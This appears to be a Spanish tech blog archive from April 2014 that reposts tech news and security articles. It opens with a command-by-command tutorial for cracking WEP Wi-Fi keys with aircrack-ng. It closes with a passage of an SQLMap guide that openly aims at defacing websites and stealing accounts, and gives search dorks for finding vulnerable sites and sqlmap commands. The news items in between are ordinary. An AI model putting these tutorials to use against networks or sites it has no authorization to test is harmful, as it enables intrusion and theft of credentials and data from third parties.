miércoles, 30 de abril de 2014

Crackear claves Wi-Fi (WEP)

Este tutorial esta realizado en Backtrack 5 r3, pero se puede desarrollar igualmente en cualquier entorno linux, siempre y cuando tengamos la suite de aircrack

En este tutorial mostraré como crackear una red Wi-Fi con seguridad WEP, empecemos:
Iniciamos nuestra maquina, esto lo primero.... XD

El siguiente paso es preparar nuestra tarjeta de red inalambrica para ello lo primero que hay que hacer es abrir una terminal y usar el comando

airmon-ng

Aquí podemos ver nuestras tarjetas de red. Comúnmente la que utilizaremos es wlan0 pero también puede ser ath0 u alguna otra cosa.




Lo siguiente es poner la tarjeta en modo monitor, para ello hay que utilizar el comando

airmon-ng start wlan0

En donde wlan0 es nuestra interfaz de red. Como podemos ver el modo monitor se activó en la interfaz mon0 que es la que utilizaremos de ahora en adelante.


El siguiente paso es escanear las redes disponibles, para ello utilizaremos el comando

airodump-ng mon0

donde

mon0 es nuestra interfaz de red 
y obtendremos lo siguiente:


Después de un rato hay que presionar Ctrl+c para detenerlo. Hay que anotar el canal, y la dirección MAC (BSSID) pues la utilizaremos más adelante.

El siguiente paso es comenzar a capturar los paquetes de la red, para ello utilizaremos el comando

airodump-ng -c (canal) --bssid (bssid) -w (nombre del archivo) mon0

ejem airodump-ng -c 1 --bssid 98:2C:BE:D8:E6:22 -w crackwep mon0

donde:

-c = Canal en donde está la red
--bssid = Dirección Mac de la red
-w = Nombre del archivo en donde se guardaran los paquetes
mon0 = Nuestra interfaz de red

Y aparecerá una ventana parecida a la anterior, pero ahora sólo aparecerá dicha red y se estarán guardando los datos en un archivo en la carpeta root.





Lo siguiente es abrir una nueva pestaña en la terminal y hacer una falsa autentificación para poder inyectar paquetes más adelante. En esta nueva pestaña utilizaremos el comando

aireplay-ng -1 0 -a (bssid) mon0

ejem aireplay-ng -1 0 -a 98:2C:BE:D8:E6:22 mon0

Donde:

-1 = Flag de aireplay para la falsa autentificación, el 0 indica cada cuando se hace la falsa autentificación.
-a = MAC de la red.
mon0 = Nuestra interfaz de red.

Aparecerá algo así:



El siguiente paso es capturar peticiones ARP e inyectarlas para generar paquetes que nos serviran para crackear el pass. Para ello utilizaremos el comando

aireplay-ng -3 -b (bessid)mon0

ejem aireplay-ng -3 -b 98:2C:BE:D8:E6:22 mon0

Donde:

-3 = Flag de aireplay para capturar y reenviar peticiones ARP
-b = MAC de la red
mon0 = Nuestra interfaz de red

y debe aparecer lo siguiente:


Que después de unos minutos debe comenzar a capturar paquetes ARP:


En la siguiente imagen podemos ver como aumentan los Iv's que son los que necesitamos para crackear la pass WEP y aparecen como #Data en la pestaña de airodupm-ng:


Normalmente con 5000 Iv's podemos comenzar a desencriptar la clave, pero con unos 20000 es un poco más seguro, en este caso ya tenemos 18000 y aumentando por lo que ya podemos utilizar aircrack-ng. Para esto vamos a utilizar el domando

ls


Aquí podemos ver los archivos que tenemos en la carpeta root, como podemos ver están los archivos de captura que he tomado para el tutorial así como algunos otros, de aquí el que nos servira es el de crackwep-01.cap Que regresando un poco fue el nombre que le dimos al utilizar en airodump-ng la opción -w, pero sólo habiamos puesto crackwep, es por eso que utilizamos el camndo "ls"

El archivo que utilizaremos siempre será el que tenga la extensión .cap
Ahora que tenemos el nombre, llego la hora de usar aircrack-ng, para esto usaremos el comando

aircrack-ng (archivo.cap)

ejem aircrack-ng crackwep-01.cap

Donde:

crackwep-01.cap es el nombre del archivo que creamos con airodump-ng y en donde se guardan los paquetes. Entonces aparecerá algo así;


Como podemos ver, tuvimos los Iv's suficientes y la clave a parece a un lado de KEY FOUND y aparece entre corchetes; la clave seria "0701714181"

Y bueno eso fue todo :)



http://siteapolo.blogspot.com.es/2012/10/crackear-claves-wep-wi-fi-con-backtrack.html

Las grandes mentiras de Internet, versión española

Hace poco nos topamos con un pequeño gráfico que nos mostraba las grandes mentiras de internet, y no hemos podido resistirnos a hacer nuestra propia versión a la española para reflejar que la red hispanoparlante tiene sus propios grandes engaños. Podéis ver el resultado en la imagen superior.

http://www.genbeta.com/web/las-grandes-mentiras-de-internet-version-espanola

Adblock Plus ya no dará soporte a IE 6 y 7



El bloqueador de anuncios por excelencia va a dejar de dar funcionar en Internet Explorer 6 y 7 después de su última actualización. Debido a que se complica cada vez más el dar soporte a navegadores antiguos y que estos tienen una baja cuota de mercado, desde Adblock Plus han decidido no dar servicio a las versiones anteriores a IE 8.

Aunque llegaron un poco tarde a Internet Explorer, no hace ni un año, Adblock Plus se ha convertido en uno de los bloqueadores de anuncios más utilizados por los usuarios. Pero ahora van a actualizar la versión del software y han decidido dejar atrás a las versiones 6 y 7 de Internet Explorer, el navegador de Microsoft.

http://www.softzone.es/2014/04/30/adblock-plus-ya-no-dara-soporte-a-ie-6-y-7/

Los usuarios de Google Chrome siguen expuestos a Heartbleed

Tras el descubrimiento de Heartbleed, Google se puso manos a la obra para desarrollar un módulo de seguridad en su navegador Chrome que detectara las páginas webs vulnerables. Sin embargo según un informe, no funciona como esperaban en Mountain View. Conoce más detalles a continuación.

El pasado 8 de abril salía a la luz una vulnerabilidad que había estado oculta en la sombra durante años. Conocida como Heartbleed, se trata de un agujero de seguridad en OpenSSL que ha expuesto todo este tiempo las claves secretas que se utilizan para identificar los proveedores de servicios, cifrar el tráfico, los nombres o las contraseñas de los usuarios. Como os contamos en su día, permitía a los atacantes leer 64 KB de la memoria del servidor.

Una de las vulnerabilidades más graves encontradas en los últimos tiempos que afectaba a multitud de servicios, entre los que se encontraban Yahoo!, Flickr, 500px, Redtube o la página de XDA Developers. A pesar de que los responsables actuaron con la mayor celeridad posible para atajar este problema, sigue sin erradicarse por completo.

Google, una vez hecho público el fallo de seguridad y al igual que otros, puso en marcha el desarrollo de un módulo de seguridad para su navegador que alertara a los usuarios de los sitios con certificados digitales potencialmente peligrosos para que de esta manera evitarán entrar en estas webs y por tanto, pusieran en peligro sus datos y su información. El problema es que según un informe elaborado por varios expertos de seguridad, la efectividad de este módulo es realmente baja.

Los de Mountain View utilizarían para detectar estos sitios una lista creada y mantenida por ellos mismos, CRL Set, en la que se incluyen aquellas webs que han sido marcadas como vulnerables o alojan contenido malicioso. Es decir, si intentamos acceder a una de estas direcciones automáticamente Chrome nos bloquea el acceso. ¿Cuál es el problema? Como indica el documento, esta lista únicamente incluye un 2% de los certificados digitales que han sido revocados por Heartbleed.

Como leemos en RedesZone, esto quiere decir que Google Chrome no protege contra el 98% de páginas vulnerables. Además, podría ser negativo para el rendimiento de Internet ya que la lista podría incluir certificados digitales caducados que provoquen una sobrecarga en la red. La alternativa a la solución propuesta por Google sería un robot que se encargase de automatizar esta tarea, aunque tendremos que esperar para ver qué medidas adoptan ante el alto riego existente.

http://www.adslzone.net/2014/04/30/los-usuarios-de-google-chrome-siguen-expuestos-heartbleed/

Pero, ¿cómo se puede infectar mi ordenador si sólo he visitado una web?

¿Nunca os habéis preguntado cómo es posible que con sólo abrir una página web o un fichero creado para la ocasión, los hackers sean capaces de aprovecharse de una vulnerabilidad y tomar el control de un ordenador? Tenemos un ejemplo muy reciente de esto en el fallo de Internet Explorer descubierto hace unos días. Un objeto Flash especialmente preparado que permite a un atacante tomar control de tu equipo como por arte de magia.

¿Qué está pasando en realidad en estos ataques? En este artículo vamos a tratar de explicar sus fundamentos básicos: las técnicas que se usan en la práctica son bastante más complejas y enrevesadas, pero siempre responden a la misma idea, que es que se sobreescriban ciertos datos en memoria.

http://www.genbeta.com/seguridad/pero-como-se-puede-infectar-mi-ordenador-si-solo-he-visitado-una-web

lunes, 28 de abril de 2014

Cómo ser más influyente en las redes sociales

Reconozcámoslo, a todos nos gusta ver que tenemos un seguidor más en las redes sociales. Es sinónimo de interés y representa la importancia que tiene aquello que decimos. Para las empresas ocurre lo mismo, ya que gran parte de sus beneficios dependen de la comunicación con los clientes. Gracias a las redes sociales podemos hacer uso de determinadas herramientas o trucos que aumentarán la influencia de nuestras opiniones, pero ¿cuáles son?.

1. Debemos defender 100% una causa que, en el caso de las empresas, será nuestra marca. Para ello debemos estar al día de todo lo que ocurre en nuestro sector y mantener informados a los seguidores de la actualidad de la compañía.

2. Intenta destacar por encima de los demás mediante publicaciones originales. Si todo el mundo está centrando el tema de conversación en un asunto determinado, dale un giro que haga que los comentarios se centren en ti. Por ejemplo, si en ese momento se juega un partido de fútbol importante puedes hacer una conexión con tu producto y ese evento.

3. Haz uso de efectos audiovisuales para convertir tus publicaciones en contenidos virales. La gente quiere ver cosas que le llamen la atención y las fotografías y los vídeos son los mejores aliados en estos casos. También puedes proponer algún plan interactivo con los seguidores como chats o videoconferencias.

4. Es fundamental que emplees parte de tu tiempo en conocer a tus seguidores para saber qué debes darles. Uno de los métodos más útiles es la comunicación directa. Habla con ellos para que vean que te preocupas por lo que dicen y para entenderles mejor. Además sembrarás una confianza que no suele ser muy común en empresas que tienen un gran número de seguidores.

5. En definitiva, debes dejar claro que tienes los pies en la tierra sin dejarte llevar por la masa. Tus publicaciones se caracterizarán por contar con un trato directo con tus usuarios y por adelantarte a los acontecimientos de manera original.

http://www.forbesmagazine.es/actualidad-noticia/como-ser-mas-influyente-redes-sociales_2065.html#

Utiliza WhatsApp en tu PC con Andy OS

Andy OS es un programa para Windows y Mac que nos permite emular Android en nuestro ordenador y utilizar todas las aplicaciones que tengamos en nuestro dispositivo, entre ellas WhatsApp. Además, es compatible con Google Play y nos permite utilizar nuestro teléfono como mando para jugar a videojuegos.

¿A quién no le gustaría utilizar WhatsApp más allá de nuestro teléfono? Por el momento, no existen versiones del popular servicio de mensajería instantánea para PC o tableta, pero Andy OS puede ser una buena solución para nuestro ordenador. Este programa, disponible para Windows y Mac, emula el sistema operativo de Google en nuestro PC y nos permite tener una experiencia Android total, ejecutando cualquier aplicación o videojuego de nuestro dispositivo y mostrando la interfaz del sistema operativo en nuestro monitor.

http://www.adslzone.net/2014/04/28/utiliza-whatsapp-en-tu-pc-con-andy-os/

El Nokia 'Superman' de Microsoft será el teléfono Windows para 'selfies'

Tras la adquisición de Nokia el 25 de abril, Microsoft ha empezado a planear cómo serán sus primeros dispositivos con Windows Phone 8.1. Uno de sus futuros dispositivos se llamará Nokia 'Superman' y se centrará en las capacidades de la cámara frontal, según informa la web The Verge.

Según las fuentes del medio, el Nokia 'Superman' contará con una cámara de 5 megapíxeles en la parte delantera, en lugar de la oferta estándar de 1 megapíxel de los teléfonos de Nokia. No está claro si Microsoft planea comercializar 'Superman' como el teléfono para 'selfies', pero una cámara frontal con esta capacidad indica que pueden ir por ahí los tiros, según The Verge.

'Superman' se unirá al HTC One M8 como el 'smartphone' en el mercado con una cámara frontal de 5 megapíxeles.

Según The Verge el Nokia 'Superman' está diseñado como un teléfono de gama media de 4,7 pulgadas y se podrá ver ya a finales de año.

Además Microsoft también estaría trabajando en la actualización del actual Windows Phone 8.1. La actualización coincidiría con los nuevos terminales y se extendería a los dispositivos existentes.

Otro rumores de los que se hace eco The Verge apuntan a un trío de teléfonos que la multinacional estadounidense estaría planeando sacar con Windows Phone 8.1 también este mismo año, pero todavía no está claro si llevarán la marca Nokia.

http://www.iblnews.com/story/82552

Amena apuesta por tráfico ilimitado en 4G acabando con la neutralidad de la red

Amena ha anunciado hoy nuevas rebajas en sus tarifas de móvil con la modificación de “Amena en casa” apostando por tráfico ilimitado en 4G. Pero lo que no ha trascendido hasta ahora es lo que viene en la letra pequeña, ya que las condiciones de la tarifa se han modificado afectando a la neutralidad de la red.

Hace unas horas os contábamos las modificaciones introducidas por Amena en sus tarifas de móvil, centrando los cambios en la tarifa “Amena en casa”, su servicio de Internet con 4G. A partir de ahora, los usuarios de esta tarifa no tendrán límites en la navegación, ya que hasta ahora el límite era de 10 GB, aunque con algunos matices. A cambio, se han modificado las condiciones de la tarifa, afectando a la neutralidad de la red porque el OMV de Orange hace una distinción entre el tráfico utilizado para navegar y el utilizado para realizar descargas.

http://www.adslzone.net/2014/04/28/amena-apuesta-por-trafico-ilimitado-en-4g-acabando-con-la-neutralidad-de-la-red/

Debian Wheezy 7.5 ya está disponible para descargar

Debian es una de las distribuciones basadas en Linux más conocidas y utilizadas. Muchas otras distribuciones la utilizan como distribución base a la que luego añaden la capa de ajustes y personalización correspondientes como por ejemplo Ubuntu. Mantener Debian actualizado es vital si queremos tener siempre la mejor seguridad posible de nuestro sistema y de todas las herramientas de este.

A lo largo de este fin de semana apareció en la página web principal de Debian la nueva versión Debian Wheezy 7.5. Esta versión se centra en la corrección de errores y solución de problemas presentes en la versión anterior del sistema operativo.

http://www.redeszone.net/2014/04/28/debian-wheezy-7-5-ya-esta-disponible-para-descargar/

domingo, 27 de abril de 2014

Netflix parece querer pasarse al P2P

Muchas compañías que comenzaron utilizando redes P2P parecen estar abandonando esta tecnología por volverse a un modelo cliente-servidor, como es el caso de Spotify. Sin embargo, Netflix parece estar planteándose muy seriamente hacer el movimiento inverso, y así lo refleja una oferta de empleo publicada en su portal.

«Netflix busca a un Ingeniero de Software senior con experiencia y experto en redes peer-to-peer». Así reza la oferta publicada en su portal en la que se indica que el empleado recién incorporado será responsable de integrar esta nueva red P2P con la actual red de distribución de contenidos. En el caso de Netflix tiene nombre propio, Open Connect, aunque utilice "por debajo" los servicios de otras empresas.

La oferta contiene otros requisitos más que lógicos para el puesto propuesto: conocimiento de sistemas *nix (lo cual tiene sentido, teniendo en cuenta que el Open Connect Appliance utiliza FreeBSD), o el conocimiento en redes TCP/IP.

Después de pagar a Comcast...

La publicación de esta oferta de empleo, desde luego, es llamativa, después de la firma del acuerdo (monetario, por supuesto) con Comcast para la comunicación directa entre Netflix y la red del ISP americano, y que según muchos viola la neutralidad de la red.

La integración de una red peer to peer en la arquitectura de distribución de contenidos de un servicio como Netflix, que sirve una gran cantidad de datos a muchos usuarios y al mismo tiempo, debería aliviar (al menos en parte) los problemas de congestión que el servicio de streaming venía sufriendo. Sobre todo cuando hablamos de contenidos populares y que estarían siendo descargados y reproducidos simultáneamente por muchos usuarios.

Además, viendo que el próximo paso clave de Netflix es la distribución de contenido a resoluciones UltraHD, tiene mucho sentido que busquen modos técnicos de aliviar sus redes y ofrecer una mejor experiencia a sus usuarios.

Vía | Ars Technica

http://www.genbeta.com/multimedia/netflix-parece-querer-pasarse-al-p2p

Parte del arsenal nuclear de EE.UU. se controla con equipos antiguos que usan..

Tras el escándalo que ha salpicado a algunos oficiales de la USAF (United States Air Force), la cadena norteamericana CBS ha iniciado un trabajo de investigación para el prestigioso programa "60 Minutos", y lo que ha encontrado tras visitar una base en Wyoming es desconcertante: el control de misiles nucleares se realiza con equipos antiguos que usan disquetes.

Por si fuera poco, las comunicaciones de la base con el exterior tienen lugar mediante conexiones analógicas en un estado tan lamentable, que los oficiales tienen dificultad para escuchar las órdenes que se les cursan

http://www.genbeta.com/seguridad/parte-del-arsenal-nuclear-de-ee-uu-se-controla-con-equipos-antiguos-que-usan-disquetes

Ya puedes silenciar tus grupos de WhatsApp por ¡100 años!

WhatsApp ha cambiado nuestra vida, para bien y para mal. Nos permite comunicarnos con familiares o amigos que viven incluso en otros continente, pero a veces también hace que tengamos que estar aguantando vez tras vez a un grupo de pesados que no dejan de hablar. Podíamos silenciarlos, es verdad, pero para algunos, un año no era suficiente. Ahora, puedes silenciar grupos hasta 100 años.

Nada más y nada menos que un siglo. Lo más probable es que ninguno de nosotros vaya a vivir un siglo más, al menos no si tenéis capacidad para leer esto. Pero lo que es seguro es que WhatsApp no estará activo como servicio cuando hayan pasado 100 años. No obstante, lo que la compañía quiere transmitir es que es posible olvidarse de un grupo, sin que ellos lo sepan, pues no tienes por qué abandonarlo.

http://androidayuda.com/2014/04/26/ya-puedes-silenciar-tus-grupos-de-whatsapp-por-100-anos/

El Gobierno confirma que estudia dotar a los policías con 'Google Glass'

Madrid. (Europa Press).- El Gobierno ha confirmado por medio de una respuesta parlamentaria escrita a la que ha tenido acceso Europa Press que está estudiando la posibilidad de dotar a los agentes de Policía de Google Glass. Este dispositivo está valorado en más de 1.000 euros cada par. "Con respecto al uso de las denominadas Google Glass, las posibles utilidades operativas de este dispositivo óptico están siendo exploradas por las distintas áreas funcionales del Cuerpo Nacional de Policía, de cara al incremento de la seguridad para los agentes y mejora de la respuesta al ciudadano", dice el Ejecutivo.

Contesta así el Gobierno a la pregunta formulada por el diputado de IU Ricardo Sixto, quien se interesó por la "compatibilidad de la inversión en las Google Glass para las patrullas policiales con la situación en la que se encuentran". Ya el pasado mes de enero, la Dirección General de la Policía indicó que con las Google Glass se avanzaría en el Plan Estratégico de la Policía que pretende la transformación del Cuerpo en una verdadera seguridad inteligente a través del proyecto denominado Policía 3.0.

El director de la Policía, Ignacio Cosidó, se ha interesado por las características de estos dispositivos y su posible utilidad en la actuación diaria de los agentes. Según la Policía, las Google Glass permitirían la visualización en directo de las cámaras de seguridad próximas; monitorizar y registrar la actuación del agente; acceso a "Street View"; captura de imágenes y vídeos para reconocimiento facial, comprobación de datos o intercambio con otras patrullas; acceso a bases de datos policiales, o información sobre las unidades comisionadas y servicios de apoyo.

Además, podrían integrar sistemas de reconocimiento facial, sistemas de gestión de vehículos, bases de antecedentes policiales, archivos de datos documentales, información de normativa penal, policial y procedimental, así como protocolos de actuación, entre otros.

http://www.lavanguardia.com/tecnologia/moviles-dispositivos/20140427/54406387903/gobierno-confirma-policia-google-glass.html

sábado, 26 de abril de 2014

Todo lo que necesitas saber sobre el final de la neutralidad de Internet

Puede que sea el final de Internet tal y como lo conocemos. De momento, es Estados Unidos el que abre la puerta a un internet menos democrático con autopistas de velocidad para acceder a algunas páginas y carreteras con baches para otras (las que no se lo puedan pagar).

Ese es el miedo que manifestaron una vez más los defensores de consumidores y webs especializadas cuando, este jueves, la Federal Communications Commision (FCC) -la agencia que regula las comunicaciones en Estados Unidos- lanzó una propuesta con las nuevas normas que controlarán el servicio de Internet. Unas reglas que se votarán a final de año y que acabarían con la neutralidad de la red, o con la idea de que se debería tratar todo el tráfico por igual.

EE UU abre la puerta al Internet a dos velocidades

La Comisión Federal de Comunicaciones de Estados Unidos prepara la creación de nuevas normas que terminarán con el principio de ‘neutralidad’ en el que se basa el funcionamiento actual de la Red. La modificación, adelantada este miércoles por el diario The Wall Street Journal, supone un giro en el planteamiento de la FCC hasta ahora y va en contra de lo defendido por el presidente Obama para la regulación de Internet.

El principio de 'neutralidad de la red' establece que todos los proveedores de conexión a Internet deben ofrecer los contenidos de manera igualitaria, a la misma velocidad, y que los usuarios también tendrán por tanto un acceso equilibrado a los mismos. Sin embargo, las nuevas reglas que prepara la FCC contemplan la creación de un “carril rápido”, una conexión privilegiada para aquellas empresas que paguen por ello.

Los defensores de la neutralidad en la red siempre han argumentado que el acceso especial a determinados contenidos, ofreciendo una velocidad más alta a cambio de un coste extra, discriminará contra pequeñas y medianas empresas y perjudicará la innovación en el sector digital. El cambio también podría hacer que el nuevo coste por conexiones más rápidas termine repercutiendo en los consumidores.

Hace sólo tres meses, una corte federal de apelaciones falló en contra de este principio. El tribunal estableció que la empresa Verizon sí tiene derecho a crear diferentes velocidades de acceso a contenidos de internet, frente a lo que defendía el Gobierno, dentro de las normativa vigente. La regulación actual reconoce a los operadores de internet como servicios de información y no de telecomunicaciones, por lo que no puede limitar su derecho a establecer distintos tipos de acceso al contenido online.

Si la FCC procede finalmente con estos cambios, distintas compañías como Disney, Netflix o el servicio de streaming de Amazon pueden contratar el “carril rápido” para que los usuarios descarguen sus datos a mayor velocidad. El nuevo contexto no está libre de obstáculos. La Comisión deberá determinar además qué limitaciones impone, si así ocurre finalmente, a grupos como Comcast, uno de los principales proveedores de internet, y dueño de NBCUniversal, uno de los mayores productores de contenido audiovisual del país.

Según explica el diario The New York Times tras consultar a fuentes implicadas en la elaboración de las nuevas normas, la FCC obligaría a los proveedores de Internet a revelar a qué empresas conceden el acceso más rápido. La Comisión también tendría que evaluar si el cobro por descargas más veloces perjudica a los consumidores de manera discriminatoria.

Durante los últimos años, las principales compañías estadounidenses han presionado para que la FCC actúe en contra de la neutralidad en la red. El presidente Obama planteó durante la campaña electoral de 2008 que siempre defendería ese principio, ya que su eliminación podría perjudicar a las empresas más pequeñas que no puedan financiar una descarga privilegiada de sus contenidos. Sin embargo, la FCC es un organismo independiente de la Administración y cualquier diferencia entre ambos va camino de resolverse en los tribunales.

Apple activa un programa para solucionar un fallo en el iPhone 5

El error afecta a ciertos dispositivos e impide que el botón de bloqueo/encendido del teléfono funcione con normalidad. Por ahora, el programa es para EE.UU. y Canadá pero llegará a más países en mayo.

Si uno busca “problema con el botón de bloqueo en iPhone 5” verá multitud de mensajes en foros y páginas web sobre el tema. Ahora, Apple ha puesto en marcha un programa de reparación para que los usuarios afectados por un fallo que impide que dicho botón funcione correctamente o lo haga de manera errática, puedan arreglar su dispositivo.

Tema: Hackean cientos de cuentas de Twitter para hacer SPAM

El pasado míercoles cientos de cuentas en la red social Twitter fueron hackeadas para hacer SPAM. Las cuentas comprometidas hacían mención a píldoras milagrosas para dietas, enlaces a páginas web donde había revistas falsas sobre la salud femenina donde había enlaces con material malicioso que se descargaba al ordenador de los usuarios.

Los seguidores de estas cuentas hackeadas veían en su timeline tweets como el siguiente: “Si no hubiera probado ésto mi vida no hubiera cambiado” seguido del enlace a contenido malicioso que afectó a cientos de personas

Llega el nuevo mercado negro global y en línea capaz de burlar a la Policía

Llega el nuevo mercado negro global y en línea capaz de burlar a la Policía y al FBI



Algunos piratas electrónicos no cejan en su intento de 'revivir' un mercado negro en la Red como el famoso Silk Road pero que sea invulnerable. De hecho, ya cuentan con un prototipo que iguala sus propiedades y que le supera ya en popularidad.

Pese al esfuerzo de los creadores del mercado negro Silk Road para hacerlo invencible, la Oficina Federal de Investigación estadounidense (FBI) logró neutralizarlo simplemente incautando su servidor. Para evitar que se repita la historia, su sucesor tiene que estar absolutamente descentralizado, sostienen los creadores de 'Dark Market', el prototipo del nuevo mercado negro global en línea, según la revista 'Wired'.

De esta manera han logrado crear un sistema 'peer-to-peer' totalmente descentralizado. La ausencia de un núcleo implica que para combatirlo la policía tendría que perseguir a cada uno de sus usuarios, algo que resultaría imposible si el nuevo mercado en línea gana la suficiente popularidad. Su concepto ha ganado el primer premio de 20.000 de dólares en el 'Bitcóin hackathon' que se celebró este mes en Toronto.

Pese a que el prototipo del nuevo mercado negro ya existe y es operable, su único problema estriba en que aún le falta anonimidad, ya que cada usuario puede ver la dirección IP de cualquier otro usuario. Para lograr el anonimato los creadores tienen que integrar a su proyecto una protección como Tor. El problema reside en que los creadores están demasiado ocupados con otros proyectos para realizar este cambio inmediatamente.

No obstante, Dark Market ya cuenta con todas las propiedades que forjaron el éxito de Silk Road. Es decir, los usuarios pueden comunicarse de forma privada y realizar transacciones, existen páginas individuales donde los vendedores pueden mostrar sus mercancías, cuenta con un sistema de reputación de usuarios con calificaciones y comentarios, y además proporciona garantías de pago y de recibo de artículos comprados.

Cada usuario puede ser vendedor, comprador, y también actuar de árbitro para que otros usuarios realicen un convenio. El sistema no cuenta con ningún servidor central y funciona a través del software que cada uno de los usuarios descarga e instala en su equipo, permitiendo que cada usuario se ponga en contacto con otros de manera directa. Además, está suficientemente desarrollado para prevenir la posibilidad de fraude. Su moneda de pago es el bitcóin.

Los creadores del programa no temen a la policía ni al FBI, argumentando que solo crearon un código fuente del programa. "El código es una forma de expresión, uno no puede ser encarcelado por expresar una idea", dice uno de creadores citado por 'Wired'. En todo caso, la idea de descentralización implica que incluso si los creadores fueran encarcelados, el mercado negro seguiría funcionando como si no hubiera pasado nada.

viernes, 25 de abril de 2014

Detectada una extensión en Chrome que roba Bitcoins

Las extensiones de Google Chrome han aumentado claramente en número. Sin embargo, proporcionalmente también se ha visto aumentada la presencia de extensiones maliciosas para el navegador. La última detectada es capaz de robar los Bitcoin que el usuario tiene almacenados en su monedero virtual, pudiendo robar incluso los credenciales de este.

Cryptsy Dogecoin (DOGE) Live Ticker, que así es como llama la extensión a la que hacemos referencia, se encuentra aún disponible en la tienda de extensiones del navegador a la espera de que el gigante de Internet tome la decisión de eliminarla. Parece ser que el aviso ha sido dado por un usuario al comprobar que la actualización de la versión inicial de dicha extensión poseía un código malicioso.

Putin declara que Internet es “un proyecto de la CIA”

Vladimir Putin dio ayer una enérgica señal en el sentido que Rusia preferiría poner fin al carácter global de Internet, debido al espionaje, igualmente global, de la NSA.

Diario TI 25/04/14 7:53:17
El periódico británico The Guardian -el mismo que publicó como primicia en junio de 2013 las filtraciones de Edward Snowden- escribe que Vladimir Putin declaró el 24 de abril durante una conferencia de prensa realizada en San Petersburgo, Rusia, que Internet fue en su momento estructurada por la CIA, que continuó desarrollándola con el paso de los años.

Putin declaró que “el proyecto de la CIA sigue en curso y Rusia necesita protegerse. Nuestra nación tiene el deber de resistir tal influencia, y luchar por sus intereses online”.

El periódico recuerda que durante una reciente sesión de preguntas y respuestas transmitida por la televisión rusa, Putin rebatió un planteamiento de Edward Snowden, recibido en directo, en el sentido que Rusia también intercepta y almacena comunicaciones captadas desde Internet; es decir, la misma práctica que critica a Estados Unidos. La respuesta de Putin, celebrada con aplausos de los asistentes, habría sido “espero que no lo estemos haciendo; no tenemos tanto dinero como en Estados Unidos”.

Luego, en tono más serio, Putin habría confirmado que efectivamente en Rusia se vigila a criminales y a potenciales terroristas, aunque negó que lo mismo sea el caso “para los ciudadanos normales”.

Los comentarios de Putin en San Petersburgo se suman a las enérgicas críticas de la presidenta de Brasil, Dilma Rousseff y de la canciller alemana Angela Merkel. Alemania incluso ha sondeado la idea de crear su propia Internet para protegerse del espionaje estadounidense.

Esta semana, el parlamento ruso aprobó una ley que requiere a los operadores de redes sociales extranjeros tener sus servidores en territorio ruso. La ley también les obliga a mantener durante 6 meses toda la información y tráfico generado por sus usuarios.

El propio Edward Snowden ha enfrentado críticas desde Estados Unidos, por haber aceptado asilo en Rusia, manteniéndose a la vez silencioso respecto del carácter autoritario del régimen de Moscú. Después de la pregunta en el programa de televisión, citada anteriormente, las críticas apuntaron a que había hecho a Putin una pregunta servil y blanda.

En julio de 2013, Ruslan Gatttarov, aliado político de Vladimir Putin y miembro de la cámara alta de la Asamblea Legislativa de la Federación Rusa, donde preside el Comité para el Desarrollo de la Sociedad de la Información, declaró que “todos, y no sólo Estados Unidos, deben tener acceso al ‘interruptor principal de Internet”, planteando que Rusia debería tener el mismo acceso a la información de Internet que la NSA.

Fuente: http://diarioti.com/putin-declara-que-internet-es-un-proyecto-de-la-cia/77579

El Menú de Inicio volverá en agosto a Windows

Microsoft presentó Windows 8 y con él, una gran cantidad de novedades. Entre ellas, algunas que no han acabado de convencer a los usuarios y le han valido para ganarse un buen puñado de críticas. Entre estas novedades, destacaba la ausencia del menú de inicio, que podría volver de la mano de una segunda actualización de Windows 8.1.

A principios del mes de abril, durante el evento Build 2014 se oficializaba la llegada de Windows 8.1 Update 1 confirmando parte del sinfín de informaciones referentes que habían aparecido. Tal y como se había comentado, esta actualización ha situado a los usuarios de ratón y teclado de nuevo en una posición preferente, algo que no ocurrió con el lanzamiento de Windows 8, lo que acabó costando a Microsoft una retahíla de críticas.

Guia SQLMap

Hoy os enseñare como usar la herramienta sqlmap de forma básica y sencilla, que nos puede servir para muchos propósitos como Defacear webs (modificación de la web), sacar cuentas de usuarios con sus contraseñas, sacar la cuenta administrativa del lugar y tener control completo del servidor web, sacar información importante o valiosa etc. Empezamos!

- INTRODUCCIÓN 

¿Que es SQLMap?
sqlmap es una herramienta de pruebas de penetración de código abierto, que automatiza el proceso de detectar y explotar los errores de inyección SQL. (Mucho mejor que hacerlo a mano)
sqlmap es una herramienta esencial en el pentesting web y muy útil a la hora de explotar Inyecciones SQL

¿Como encuentro paginas con Vulnerablilidades SQL?
Bueno lo primero, sqlmap explota variables, por lo que la estructura de una web vulnerable sera algo parecido a esto:

- http://www.paginadepepito.com/index.php?id=4

Una forma de encontrar paginas web, que muestren una variable y una estructura parecida es mediante Dorks, aunque no es necesario, las variables de una web se pueden buscar accediendo a secciones de la misma

¿Que es un Dork?
Los dorks son combinaciones de operadores de búsqueda especiales que se utilizan para extraer información valiosa o sensible desde Google.

Antes de continuar si no te sonaba nada de esto recomiendo ver esta guia de HackxCrack que muestra como usar varios navegadores para el hacking o extracción de datos

Algunos Dorks:

inurl:index.php?id=
inurl:news.php?id=
inurl:download.php?id=

- BUSCANDO PAGINAS VULNERABLES

Bueno esto es tan sencillo como introducir el dork en el navegador: Google, Bing, etc e ir accediendo a las paginas, una vez dentro de una web, nos aparecerá una estructura parecida a la ya comentada , si no pues busca mas paginas hasta encontrarla XD


-http://www.paginadepepito.com/index.php?id=4

Bien, ahora para saber si es vulnerable a SQL se le introduce a la variable 'id=' un caracter no valido como un apostrofe ( ' ) quedando de esta manera:



-http://www.paginadepepito.com/index.php?id='

y esto tendría que mostrar un error muy parecido a este, para asegurarte, observa si aparece la palabra sql en el mensaje de error.

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result

Si no lo muestra es que no es vulnerable, y hay que seguir buscando mas webs

-EXPLOTANDO LA VULNERABILIDAD

Llego la hora, lo interesante, si no hay ningún problema deberías de tener ya una pagina con una vulnerabilidad sql que muestre el mensaje de error

Bien, empecemos, ejecutamos sqlmap en la terminal de comandos de nuestro sistema operativo, yo al tener kali linux lo puedo ejecutar directamente, introduciendo sqlmap, después introducimos el siguiente comando:

sqlmap -u (pagina vulnerable) --dbs

ejemplo: sqlmap -u http://www.paginadepepito.com/index.php?id=4 --dbs

con el parametro --url le pasamos la url que es vulnerable y con --dbs le pedimos que liste las bases de datos.
Cuando ejecutemos eso, sqlmap usará heurísticas para comprobar que gestor de bases de datos utiliza el sitio, y lo auditará (¡Y todo automático!)


Le tomó un poco más de un minuto encontrar la consulta SQL para decirnos que utiliza MySQL y que la variable id es vulnerable. Por último nos pregunta si queremos buscar otras variables vulnerables, a lo que yo voy a responder que no.

